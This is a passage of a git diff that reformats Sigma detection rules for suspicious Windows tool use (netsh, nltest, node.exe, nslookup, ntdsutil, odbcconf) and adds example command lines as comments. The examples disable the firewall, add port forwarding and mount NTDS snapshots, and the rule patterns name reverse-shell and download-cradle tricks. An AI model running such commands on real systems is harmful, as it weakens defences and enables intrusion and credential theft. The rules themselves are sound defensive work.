selection_img: - - Image|endswith: \netsh.exe - - OriginalFileName: netsh.exe + - Image|endswith: \netsh.exe + - OriginalFileName: netsh.exe selection_cli_1: - CommandLine|contains|all: + # Example: netsh firewall set opmode disable + CommandLine|contains|all: - firewall - set - opmode - disable selection_cli_2: - CommandLine|contains|all: + # Example: netsh advfirewall set currentprofile state off + CommandLine|contains|all: - advfirewall - set - state - - 'off' + - off condition: process_creation and (selection_img and 1 of selection_cli_*) falsepositives: - Legitimate administration activity diff --git a/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_enable_group_rule.yml b/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_enable_group_rule.yml index fff88489c..e19e143dd 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_enable_group_rule.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_enable_group_rule.yml @@ -1,8 +1,7 @@ title: Netsh Allow Group Policy on Microsoft Defender Firewall id: 347906f3-e207-4d18-ae5b-a9403d6bcdef status: test -description: Adversaries may modify system firewalls in order to bypass controls limiting - network usage +description: Adversaries may modify system firewalls in order to bypass controls limiting network usage references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-3---allow-smb-and-rdp-on-microsoft-defender-firewall - https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior @@ -21,10 +20,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \netsh.exe - - OriginalFileName: netsh.exe + - Image|endswith: \netsh.exe + - OriginalFileName: netsh.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - advfirewall - firewall - set diff --git a/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_rules_discovery.yml b/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_rules_discovery.yml index ec9307835..7dd7f0cd6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_rules_discovery.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_rules_discovery.yml @@ -1,8 +1,7 @@ title: Firewall Configuration Discovery Via Netsh.EXE id: 0e4164da-94bc-450d-a7be-a4b176179f1f status: experimental -description: Adversaries may look for details about the network configuration and - settings of systems they access or through information discovery of remote systems +description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-2---list-windows-firewall-rules - https://ss64.com/nt/netsh.html @@ -21,14 +20,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \netsh.exe - - OriginalFileName: netsh.exe + - Image|endswith: \netsh.exe + - OriginalFileName: netsh.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - 'netsh ' - 'show ' - 'firewall ' - CommandLine|contains: + CommandLine|contains: - 'config ' - 'state ' - 'rule ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_set_rule.yml b/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_set_rule.yml index 3260d4be7..d5b18af19 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_set_rule.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_netsh_fw_set_rule.yml @@ -1,8 +1,7 @@ title: Firewall Rule Update Via Netsh.EXE id: a70dcb37-3bee-453a-99df-d0c683151be6 status: test -description: Detects execution of netsh with the "advfirewall" and the "set" option - in order to set new values for properties of a existing rule +description: Detects execution of netsh with the "advfirewall" and the "set" option in order to set new values for properties of a existing rule references: - https://ss64.com/nt/netsh.html author: X__Junior (Nextron Systems) @@ -18,10 +17,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \netsh.exe - - OriginalFileName: netsh.exe + - Image|endswith: \netsh.exe + - OriginalFileName: netsh.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: + # Example 1: netsh advfirewall firewall set rule "group=\"Network Discovery\" " new enable=Yes" + # Example 2: netsh advfirewall firewall set rule "group=\"File and Printer Sharing\" " new enable=Yes" - ' firewall ' - ' set ' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml b/sigma/sysmon/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml index 26b337e80..042134b9a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml @@ -1,16 +1,13 @@ title: Potential Persistence Via Netsh Helper DLL id: 56321594-9087-49d9-bf10-524fe8479452 related: - - id: c90362e0-2df3-4e61-94fe-b37615814cb1 - type: similar - - id: e7b18879-676e-4a0e-ae18-27039185a8e7 - type: similar + - id: c90362e0-2df3-4e61-94fe-b37615814cb1 + type: similar + - id: e7b18879-676e-4a0e-ae18-27039185a8e7 + type: similar status: test -description: 'Detects the execution of netsh with "add helper" flag in order to add - a custom helper DLL. This technique can be abused to add a malicious helper DLL - that can be used as a persistence proxy that gets called when netsh.exe is executed. - - ' +description: | + Detects the execution of netsh with "add helper" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.007/T1546.007.md - https://github.com/outflanknl/NetshHelperBeacon @@ -32,10 +29,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: netsh.exe - - Image|endswith: \netsh.exe + - OriginalFileName: netsh.exe + - Image|endswith: \netsh.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - add - helper condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_netsh_packet_capture.yml b/sigma/sysmon/process_creation/proc_creation_win_netsh_packet_capture.yml index a67302976..c9398fa82 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_netsh_packet_capture.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_netsh_packet_capture.yml @@ -1,8 +1,7 @@ title: New Network Trace Capture Started Via Netsh.EXE id: d3c3861d-c504-4c77-ba55-224ba82d0118 status: test -description: Detects the execution of netsh with the "trace" flag in order to start - a network capture +description: Detects the execution of netsh with the "trace" flag in order to start a network capture references: - https://blogs.msdn.microsoft.com/canberrapfe/2012/03/30/capture-a-network-trace-without-installing-anything-capture-a-network-trace-of-a-reboot/ - https://klausjochem.me/2016/02/03/netsh-the-cyber-attackers-tool-of-choice/ @@ -22,10 +21,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \netsh.exe - - OriginalFileName: netsh.exe + - Image|endswith: \netsh.exe + - OriginalFileName: netsh.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - trace - start condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_netsh_port_forwarding.yml b/sigma/sysmon/process_creation/proc_creation_win_netsh_port_forwarding.yml index 516ade328..c2ce918ec 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_netsh_port_forwarding.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_netsh_port_forwarding.yml @@ -1,14 +1,12 @@ title: New Port Forwarding Rule Added Via Netsh.EXE id: 322ed9ec-fcab-4f67-9a34-e7c6aef43614 status: test -description: Detects the execution of netsh commands that configure a new port forwarding - (PortProxy) rule +description: Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule references: - https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html - https://adepts.of0x.cc/netsh-portproxy-code/ - https://www.dfirnotes.net/portproxy_detection/ -author: Florian Roth (Nextron Systems), omkar72, oscd.community, Swachchhanda Shrawan - Poudel +author: Florian Roth (Nextron Systems), omkar72, oscd.community, Swachchhanda Shrawan Poudel date: 2019/01/29 modified: 2023/09/01 tags: @@ -25,22 +23,23 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \netsh.exe - - OriginalFileName: netsh.exe + - Image|endswith: \netsh.exe + - OriginalFileName: netsh.exe selection_cli_1: - CommandLine|contains|all: + CommandLine|contains|all: - interface - portproxy - add - v4tov4 selection_cli_2: - CommandLine|contains|all: - - 'i ' - - 'p ' - - 'a ' - - 'v ' + CommandLine|contains|all: + # Example: netsh I p a v l=8001 listena=127.0.0.1 connectp=80 c=192.168.1.1 + - 'i ' # interface + - 'p ' # portproxy + - 'a ' # add + - 'v ' # v4tov4 selection_cli_3: - CommandLine|contains|all: + CommandLine|contains|all: - connectp - listena - c= diff --git a/sigma/sysmon/process_creation/proc_creation_win_netsh_port_forwarding_3389.yml b/sigma/sysmon/process_creation/proc_creation_win_netsh_port_forwarding_3389.yml index 58d123435..d2c4bb955 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_netsh_port_forwarding_3389.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_netsh_port_forwarding_3389.yml @@ -1,8 +1,7 @@ title: RDP Port Forwarding Rule Added Via Netsh.EXE id: 782d6f3e-4c5d-4b8c-92a3-1d05fed72e63 status: test -description: Detects the execution of netsh to configure a port forwarding of port - 3389 (RDP) rule +description: Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule references: - https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html author: Florian Roth (Nextron Systems), oscd.community @@ -22,10 +21,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \netsh.exe - - OriginalFileName: netsh.exe + - Image|endswith: \netsh.exe + - OriginalFileName: netsh.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' i' - ' p' - =3389 diff --git a/sigma/sysmon/process_creation/proc_creation_win_netsh_wifi_credential_harvesting.yml b/sigma/sysmon/process_creation/proc_creation_win_netsh_wifi_credential_harvesting.yml index 66c216657..30d460510 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_netsh_wifi_credential_harvesting.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_netsh_wifi_credential_harvesting.yml @@ -20,10 +20,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \netsh.exe - - OriginalFileName: netsh.exe + - Image|endswith: \netsh.exe + - OriginalFileName: netsh.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - wlan - ' s' - ' p' diff --git a/sigma/sysmon/process_creation/proc_creation_win_nltest_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_nltest_execution.yml index dafde2c4d..72f91a4ec 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_nltest_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_nltest_execution.yml @@ -1,10 +1,10 @@ title: Nltest.EXE Execution id: 903076ff-f442-475a-b667-4f246bcc203b related: - - id: 5cc90652-4cbd-4241-aa3b-4b462fa5a248 - type: similar - - id: eeb66bbb-3dde-4582-815a-584aee9fe6d1 - type: obsoletes + - id: 5cc90652-4cbd-4241-aa3b-4b462fa5a248 + type: similar + - id: eeb66bbb-3dde-4582-815a-584aee9fe6d1 + type: obsoletes status: test description: Detects nltest commands that can be used for information discovery references: @@ -25,8 +25,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \nltest.exe - - OriginalFileName: nltestrk.exe + - Image|endswith: \nltest.exe + - OriginalFileName: nltestrk.exe condition: process_creation and selection falsepositives: - Legitimate administration activity diff --git a/sigma/sysmon/process_creation/proc_creation_win_nltest_recon.yml b/sigma/sysmon/process_creation/proc_creation_win_nltest_recon.yml index 4b0ad9b9c..f4a666206 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_nltest_recon.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_nltest_recon.yml @@ -1,12 +1,12 @@ title: Potential Recon Activity Via Nltest.EXE id: 5cc90652-4cbd-4241-aa3b-4b462fa5a248 related: - - id: 410ad193-a728-4107-bc79-4419789fcbf8 - type: similar - - id: 903076ff-f442-475a-b667-4f246bcc203b - type: similar - - id: 77815820-246c-47b8-9741-e0def3f57308 - type: obsoletes + - id: 410ad193-a728-4107-bc79-4419789fcbf8 + type: similar + - id: 903076ff-f442-475a-b667-4f246bcc203b + type: similar + - id: 77815820-246c-47b8-9741-e0def3f57308 + type: obsoletes status: test description: Detects nltest commands that can be used for information discovery references: @@ -34,21 +34,21 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_nltest: - - Image|endswith: \nltest.exe - - OriginalFileName: nltestrk.exe + - Image|endswith: \nltest.exe + - OriginalFileName: nltestrk.exe selection_recon: - - CommandLine|contains|all: - - server - - query - - CommandLine|contains: - - /user - - all_trusts - - 'dclist:' - - 'dnsgetdc:' - - domain_trusts - - 'dsgetdc:' - - parentdomain - - trusted_domains + - CommandLine|contains|all: + - server + - query + - CommandLine|contains: + - /user + - all_trusts # Flag for /domain_trusts + - 'dclist:' + - 'dnsgetdc:' + - domain_trusts + - 'dsgetdc:' + - parentdomain + - trusted_domains condition: process_creation and (all of selection_*) falsepositives: - Legitimate administration use but user and host must be investigated diff --git a/sigma/sysmon/process_creation/proc_creation_win_node_abuse.yml b/sigma/sysmon/process_creation/proc_creation_win_node_abuse.yml index 3cb729f97..64a92026b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_node_abuse.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_node_abuse.yml @@ -1,9 +1,7 @@ title: Potential Arbitrary Code Execution Via Node.EXE id: 6640f31c-01ad-49b5-beb5-83498a5cd8bd status: test -description: Detects the execution node.exe which is shipped with multiple software - such as VMware, Adobe...etc. In order to execute arbitrary code. For example to - establish reverse shell as seen in Log4j attacks...etc +description: Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc references: - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html - https://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return @@ -25,11 +23,12 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \node.exe - CommandLine|contains: + CommandLine|contains: - ' -e ' - ' --eval ' + # Add more pattern of abuse as actions action_reverse_shell: - CommandLine|contains|all: + CommandLine|contains|all: - .exec( - net.socket - .connect diff --git a/sigma/sysmon/process_creation/proc_creation_win_node_adobe_creative_cloud_abuse.yml b/sigma/sysmon/process_creation/proc_creation_win_node_adobe_creative_cloud_abuse.yml index b0d4a8c1a..7fbb00c86 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_node_adobe_creative_cloud_abuse.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_node_adobe_creative_cloud_abuse.yml @@ -1,8 +1,7 @@ title: Node Process Executions id: df1f26d3-bea7-4700-9ea2-ad3e990cf90e status: test -description: Detects the execution of other scripts using the Node executable packaged - with Adobe Creative Cloud +description: Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud references: - https://twitter.com/mttaggart/status/1511804863293784064 author: Max Altgelt (Nextron Systems) @@ -22,7 +21,7 @@ detection: selection: Image|endswith: \Adobe Creative Cloud Experience\libs\node.exe filter: - CommandLine|contains: Adobe Creative Cloud Experience\js + CommandLine|contains: Adobe Creative Cloud Experience\js # Folder where Creative Cloud's JS resources are located condition: process_creation and (selection and not filter) fields: - Image diff --git a/sigma/sysmon/process_creation/proc_creation_win_nslookup_domain_discovery.yml b/sigma/sysmon/process_creation/proc_creation_win_nslookup_domain_discovery.yml index 6d4f8f494..677c80edd 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_nslookup_domain_discovery.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_nslookup_domain_discovery.yml @@ -1,8 +1,7 @@ title: Network Reconnaissance Activity id: e6313acd-208c-44fc-a0ff-db85d572e90e status: test -description: Detects a set of suspicious network related commands often used in recon - stages +description: Detects a set of suspicious network related commands often used in recon stages references: - https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/ author: Florian Roth (Nextron Systems) @@ -21,12 +20,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_nslookup: - CommandLine|contains|all: + CommandLine|contains|all: - nslookup - _ldap._tcp.dc._msdcs. condition: process_creation and (1 of selection*) falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend on scripts and administrative tools used in the monitored environment level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_nslookup_poweshell_download.yml b/sigma/sysmon/process_creation/proc_creation_win_nslookup_poweshell_download.yml index ef1299368..c19e3e902 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_nslookup_poweshell_download.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_nslookup_poweshell_download.yml @@ -1,13 +1,12 @@ title: Nslookup PowerShell Download Cradle - ProcessCreation id: 1b3b01c7-84e9-4072-86e5-fc285a41ff23 related: - - id: 72671447-4352-4413-bb91-b85569687135 - type: obsoletes - - id: 999bff6d-dc15-44c9-9f5c-e1051bfc86e1 - type: similar + - id: 72671447-4352-4413-bb91-b85569687135 + type: obsoletes + - id: 999bff6d-dc15-44c9-9f5c-e1051bfc86e1 + type: similar status: test -description: Detects suspicious powershell download cradle using nslookup. This cradle - uses nslookup to extract payloads from DNS records +description: Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records references: - https://twitter.com/Alh4zr3d/status/1566489367232651264 author: Nasreddine Bencherchali (Nextron Systems) @@ -24,13 +23,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|contains: \nslookup.exe - - OriginalFileName: \nslookup.exe + - Image|contains: \nslookup.exe + - OriginalFileName: \nslookup.exe selection_cmd: ParentImage|endswith: - \powershell.exe - \pwsh.exe - CommandLine|contains: + CommandLine|contains: - ' -q=txt ' - ' -querytype=txt ' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_ntdsutil_susp_usage.yml b/sigma/sysmon/process_creation/proc_creation_win_ntdsutil_susp_usage.yml index 15654c713..fa0c01d51 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_ntdsutil_susp_usage.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_ntdsutil_susp_usage.yml @@ -1,11 +1,10 @@ title: Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe) id: a58353df-af43-4753-bad0-cd83ef35eef5 related: - - id: 2afafd61-6aae-4df4-baed-139fa1f4c345 - type: derived + - id: 2afafd61-6aae-4df4-baed-139fa1f4c345 + type: derived status: test -description: Detects execution of ntdsutil.exe to perform different actions such as - restoring snapshots...etc. +description: Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc. references: - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11) - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments @@ -23,16 +22,19 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \ntdsutil.exe - - OriginalFileName: ntdsutil.exe + - Image|endswith: \ntdsutil.exe + - OriginalFileName: ntdsutil.exe selection_cli: - - CommandLine|contains|all: - - snapshot - - 'mount ' - - CommandLine|contains|all: - - ac - - ' i' - - ' ntds' + - CommandLine|contains|all: + - snapshot + - 'mount ' # mounts a specific snapshot - Ex: ntdsutil snapshot "mount c2b3e2c6-1ffb-4625-ba8e-3503c27a9fcb" quit quit + - CommandLine|contains|all: + # This offers more coverage to the "selection_oneliner_1" case in rule 8bc64091-6875-4881-aaf9-7bd25b5dda08 + # The shorest form of "activate" can "ac". But "act", "acti"...etc are also valid forms + # Same case with the "instance" flag + - ac + - ' i' + - ' ntds' condition: process_creation and (all of selection_*) falsepositives: - Legitimate usage to restore snapshots diff --git a/sigma/sysmon/process_creation/proc_creation_win_ntdsutil_usage.yml b/sigma/sysmon/process_creation/proc_creation_win_ntdsutil_usage.yml index 40ac0fe20..c24dedfee 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_ntdsutil_usage.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_ntdsutil_usage.yml @@ -1,8 +1,7 @@ title: Invocation of Active Directory Diagnostic Tool (ntdsutil.exe) id: 2afafd61-6aae-4df4-baed-139fa1f4c345 status: test -description: Detects execution of ntdsutil.exe, which can be used for various attacks - against the NTDS database (NTDS.DIT) +description: Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT) references: - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm author: Thomas Patzke diff --git a/sigma/sysmon/process_creation/proc_creation_win_odbcconf_driver_install.yml b/sigma/sysmon/process_creation/proc_creation_win_odbcconf_driver_install.yml index 49fc73473..7ef125300 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_odbcconf_driver_install.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_odbcconf_driver_install.yml @@ -1,11 +1,10 @@ title: Driver/DLL Installation Via Odbcconf.EXE id: 3f5491e2-8db8-496b-9e95-1029fce852d4 related: - - id: cb0fe7c5-f3a3-484d-aa25-d350a7912729 - type: similar + - id: cb0fe7c5-f3a3-484d-aa25-d350a7912729 + type: similar status: experimental -description: Detects execution of "odbcconf" with "INSTALLDRIVER" which installs a - new ODBC driver. Attackers abuse this to install and run malicious DLLs. +description: Detects execution of "odbcconf" with "INSTALLDRIVER" which installs a new ODBC driver. Attackers abuse this to install and run malicious DLLs. references: - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/ - https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176 @@ -24,16 +23,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \odbcconf.exe - - OriginalFileName: odbcconf.exe + - Image|endswith: \odbcconf.exe + - OriginalFileName: odbcconf.exe selection_cli: - CommandLine|contains|all: + # Note: The "/A" flag is not required to call a specific action + CommandLine|contains|all: - 'INSTALLDRIVER ' - .dll condition: process_creation and (all of selection_*) falsepositives: - - Legitimate driver DLLs being registered via "odbcconf" will generate false positives. - Investigate the path of the DLL and its contents to determine if the action - is authorized. + - Legitimate driver DLLs being registered via "odbcconf" will generate false positives. Investigate the path of the DLL and its contents to determine if the action is authorized. level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_odbcconf_driver_install_susp.yml b/sigma/sysmon/process_creation/proc_creation_win_odbcconf_driver_install_susp.yml index cd96c8dcf..66b86814a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_odbcconf_driver_install_susp.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_odbcconf_driver_install_susp.yml @@ -1,12 +1,10 @@ title: Suspicious Driver/DLL Installation Via Odbcconf.EXE id: cb0fe7c5-f3a3-484d-aa25-d350a7912729 related: - - id: 3f5491e2-8db8-496b-9e95-1029fce852d4 - type: derived + - id: 3f5491e2-8db8-496b-9e95-1029fce852d4 + type: derived status: experimental -description: Detects execution of "odbcconf" with the "INSTALLDRIVER" action where - the driver doesn't contain a ".dll" extension. This is often used as a defense - evasion method. +description: Detects execution of "odbcconf" with the "INSTALLDRIVER" action where the driver doesn't contain a ".dll" extension. This is often used as a defense evasion method. references: - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/ - https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176 @@ -25,12 +23,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \odbcconf.exe - - OriginalFileName: odbcconf.exe + - Image|endswith: \odbcconf.exe + - OriginalFileName: odbcconf.exe selection_cli: - CommandLine|contains: 'INSTALLDRIVER ' + # Note: The "/A" flag is not required to call a specific action + CommandLine|contains: 'INSTALLDRIVER ' filter_main_dll_ext: - CommandLine|contains: .dll + CommandLine|contains: .dll condition: process_creation and (all of selection_* and not 1 of filter_main_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_odbcconf_exec_susp_locations.yml b/sigma/sysmon/process_creation/proc_creation_win_odbcconf_exec_susp_locations.yml index ed6459df2..baee68bd0 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_odbcconf_exec_susp_locations.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_odbcconf_exec_susp_locations.yml @@ -1,8 +1,7 @@ title: Odbcconf.EXE Suspicious DLL Location id: 6b65c28e-11f3-46cb-902a-68f2cafaf474 status: experimental -description: Detects execution of "odbcconf" where the path of the DLL being registered - is located in a potentially suspicious location. +description: Detects execution of "odbcconf" where the path of the DLL being registered is located in a potentially suspicious location. references: - https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16 - https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html @@ -22,10 +21,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \odbcconf.exe - - OriginalFileName: odbcconf.exe + - Image|endswith: \odbcconf.exe + - OriginalFileName: odbcconf.exe selection_cli: - CommandLine|contains: + # Note: Add more suspicious locations + CommandLine|contains: - :\PerfLogs\ - :\ProgramData\ - :\Temp\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_odbcconf_register_dll_regsvr.yml b/sigma/sysmon/process_creation/proc_creation_win_odbcconf_register_dll_regsvr.yml index cfbc3d624..a47e6e836 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_odbcconf_register_dll_regsvr.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_odbcconf_register_dll_regsvr.yml @@ -1,12 +1,10 @@ title: New DLL Registered Via Odbcconf.EXE id: 9f0a8bf3-a65b-440a-8c1e-5cb1547c8e70 related: - - id: ba4cfc11-d0fa-4d94-bf20-7c332c412e76 - type: similar + - id: ba4cfc11-d0fa-4d94-bf20-7c332c412e76 + type: similar status: experimental -description: Detects execution of "odbcconf" with "REGSVR" in order to register a - new DLL (equivalent to running regsvr32). Attackers abuse this to install and - run malicious DLLs. +description: Detects execution of "odbcconf" with "REGSVR" in order to register a new DLL (equivalent to running regsvr32). Attackers abuse this to install and run malicious DLLs. references: - https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16 - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/ @@ -14,8 +12,7 @@ references: - https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176 - https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/ - https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html -author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine - Bencherchali (Nextron Systems) +author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems) date: 2023/05/22 tags: - attack.defense_evasion @@ -29,16 +26,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \odbcconf.exe - - OriginalFileName: odbcconf.exe + - Image|endswith: \odbcconf.exe + - OriginalFileName: odbcconf.exe selection_cli: - CommandLine|contains|all: + # Note: The "/A" flag is not required to call a specific action + CommandLine|contains|all: - 'REGSVR ' - .dll condition: process_creation and (all of selection_*) falsepositives: - - Legitimate DLLs being registered via "odbcconf" will generate false positives. - Investigate the path of the DLL and its content to determine if the action - is authorized. + - Legitimate DLLs being registered via "odbcconf" will generate false positives. Investigate the path of the DLL and its content to determine if the action is authorized. level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_odbcconf_register_dll_regsvr_susp.yml b/sigma/sysmon/process_creation/proc_creation_win_odbcconf_register_dll_regsvr_susp.yml index 567133fb2..b6cf0ee30 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_odbcconf_register_dll_regsvr_susp.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_odbcconf_register_dll_regsvr_susp.yml @@ -1,12 +1,10 @@ title: Potentially Suspicious DLL Registered Via Odbcconf.EXE id: ba4cfc11-d0fa-4d94-bf20-7c332c412e76 related: - - id: 9f0a8bf3-a65b-440a-8c1e-5cb1547c8e70 - type: derived + - id: 9f0a8bf3-a65b-440a-8c1e-5cb1547c8e70 + type: derived status: experimental -description: Detects execution of "odbcconf" with the "REGSVR" action where the DLL - in question doesn't contain a ".dll" extension. Which is often used as a method - to evade defenses. +description: Detects execution of "odbcconf" with the "REGSVR" action where the DLL in question doesn't contain a ".dll" extension. Which is often used as a method to evade defenses. references: - https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16 - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/ @@ -25,12 +23,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \odbcconf.exe - - OriginalFileName: odbcconf.exe + - Image|endswith: \odbcconf.exe + - OriginalFileName: odbcconf.exe selection_cli: - CommandLine|contains: 'REGSVR ' + # Note: The "/A" flag is not required to call a specific action + CommandLine|contains: 'REGSVR ' filter_main_dll_ext: - CommandLine|contains: .dll + CommandLine|contains: .dll condition: process_creation and (all of selection_* and not 1 of filter_main_*) falsepositives: - Unlikely diff --git 